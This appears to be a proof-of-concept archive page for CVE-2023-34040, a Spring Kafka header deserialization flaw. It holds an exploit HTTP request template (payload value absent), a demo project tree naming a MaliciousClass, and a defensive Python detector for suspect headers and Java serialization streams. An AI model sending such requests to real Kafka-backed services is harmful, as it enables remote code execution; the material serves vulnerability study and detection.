PoC details: 3d413ba0e17ce85b37c3fae655ec533932002b5e

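Related vulnerability
Title: Spring Framework code issue vulnerability (CVE-2023-34040)
Description: Spring Framework is an open-source Java and Java EE application framework from the US-based Spring team. The framework helps developers build high-quality applications. Spring Framework has a security vulnerability that stems from a deserialization flaw, which allows the container to deserialize headers when ErrorHandlingDeserializer is configured. Affected products and versions: Spring for Apache Kafka 3.0.9 and earlier, 2.9.10 and earlier.
Introduction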
# CVE-2023-34040
Spring Kafka Deserialization Remote Code Execution

```
POST /messages/send HTTP/1.1
Host: 127.0.0.1:8899
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,ja;q=0.7,fr;q=0.6,so;q=0.5
Connection: close
Content-Type: application/json
Content-Length: 2687

{"topic":"my-topic",
"record":"test",
"headers":{
 "springDeserializerExceptionKey":"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"
}}
```
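
A defender-side check for the request shown above, added here as an example (it is not part of the PoC repository): it flags JSON bodies that set Spring Kafka's deserialization-exception headers or carry a Java serialization stream in any header. The body shape follows the request above; the function names, the hex/base64 decodings tried and the sample values are assumptions.

```python
import base64
import binascii
import json

# Header names Spring for Apache Kafka uses to carry a serialized DeserializationException.
SUSPECT_HEADERS = {"springDeserializerExceptionKey", "springDeserializerExceptionValue"}
JAVA_STREAM_MAGIC = bytes.fromhex("aced0005")  # Java STREAM_MAGIC + STREAM_VERSION


def _candidate_decodings(value):
    """Yield the raw bytes plus hex and base64 decodings (the wire encoding is an assumption)."""
    raw = value if isinstance(value, bytes) else str(value).encode("utf-8", "replace")
    yield raw
    try:
        yield bytes.fromhex(raw.strip().decode("ascii"))
    except ValueError:  # not hex (UnicodeDecodeError is a ValueError too)
        pass
    try:
        yield base64.b64decode(raw.strip(), validate=True)
    except (binascii.Error, ValueError):
        pass


def carries_java_serialized_object(value):
    return any(d.startswith(JAVA_STREAM_MAGIC) for d in _candidate_decodings(value))


def inspect_send_request(body):
    """Return findings for a JSON body shaped like the request above."""
    try:
        doc = json.loads(body)
    except json.JSONDecodeError:
        return ["unparseable JSON body"]
    headers = doc.get("headers") if isinstance(doc, dict) else None
    if not isinstance(headers, dict):
        return []
    findings = []
    for name, value in headers.items():
        if name in SUSPECT_HEADERS:
            findings.append(f"client-supplied framework header: {name}")
        if carries_java_serialized_object(value):
            findings.append(f"Java serialization stream in header: {name}")
    return findings


if __name__ == "__main__":
    # Constructed sample: the stream magic followed by filler bytes, not a real object.
    marker = base64.b64encode(JAVA_STREAM_MAGIC + b"constructed").decode()
    sample = {"topic": "my-topic", "record": "test", "headers": {"springDeserializerExceptionKey": marker}}
    print(inspect_send_request(json.dumps(sample)))
```

The same two conditions can be enforced at the producer endpoint by rejecting any client-supplied header whose name is in `SUSPECT_HEADERS`, independent of the payload check.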
File snapshot

```
[4.0K] /data/pocs/3d413ba0e17ce85b37c3fae655ec533932002b5e
├── [2.9K] pom.xml
├── [3.2K] README.md
├── [4.0K] src
│   ├── [4.0K] main
│   │   ├── [4.0K] java
│   │   │   └── [4.0K] com
│   │   │       └── [4.0K] example
│   │   │           └── [4.0K] SpringKafkaDemo
│   │   │               ├── [4.0K] config
│   │   │               │   ├── [2.1K] KafkaConsumerConfig.java
│   │   │               │   └── [1.3K] KafkaProducerConfig.java
│   │   │               ├── [4.0K] consumer
│   │   │               │   └── [ 567] KafkaConsumer.java
│   │   │               ├── [4.0K] data
│   │   │               │   └── [ 301] MaliciousClass.java
│   │   │               ├── [4.0K] model
│   │   │               │   └── [ 263] KafkaMessage.java
│   │   │               ├── [4.0K] producer
│   │   │               │   └── [1.9K] KafkaProducer.java
│   │   │               └── [ 349] SpringKafkaDemoApplication.java
│   │   └── [4.0K] resources
│   │       └── [ 510] application.yaml
│   └── [4.0K] test
│       └── [4.0K] java
│           └── [4.0K] com
│               └── [4.0K] example
│                   └── [4.0K] SpringKafkaDemo
│                       └── [ 237] SpringKafkaDemoApplicationTests.java
└── [4.0K] target
    ├── [4.0K] classes
    │   ├── [ 510] application.yaml
    │   └── [4.0K] com
    │       └── [4.0K] example
    │           └── [4.0K] SpringKafkaDemo
    │               ├── [4.0K] config
    │               │   ├── [3.0K] KafkaConsumerConfig.class
    │               │   └── [2.0K] KafkaProducerConfig.class
    │               ├── [4.0K] consumer
    │               │   └── [1.1K] KafkaConsumer.class
    │               ├── [4.0K] data
    │               │   └── [ 753] MaliciousClass.class
    │               ├── [4.0K] model
    │               │   └── [1.3K] KafkaMessage.class
    │               ├── [4.0K] producer
    │               │   └── [3.6K] KafkaProducer.class
    │               └── [ 788] SpringKafkaDemoApplication.class
    ├── [4.0K] maven-status
    │   └── [4.0K] maven-compiler-plugin
    │       └── [4.0K] compile
    │           └── [4.0K] default-compile
    │               └── [ 733] inputFiles.lst
    └── [4.0K] test-classes
        └── [4.0K] com
            └── [4.0K] example
                └── [4.0K] SpringKafkaDemo
                    └── [ 586] SpringKafkaDemoApplicationTests.class

35 directories, 21 files
```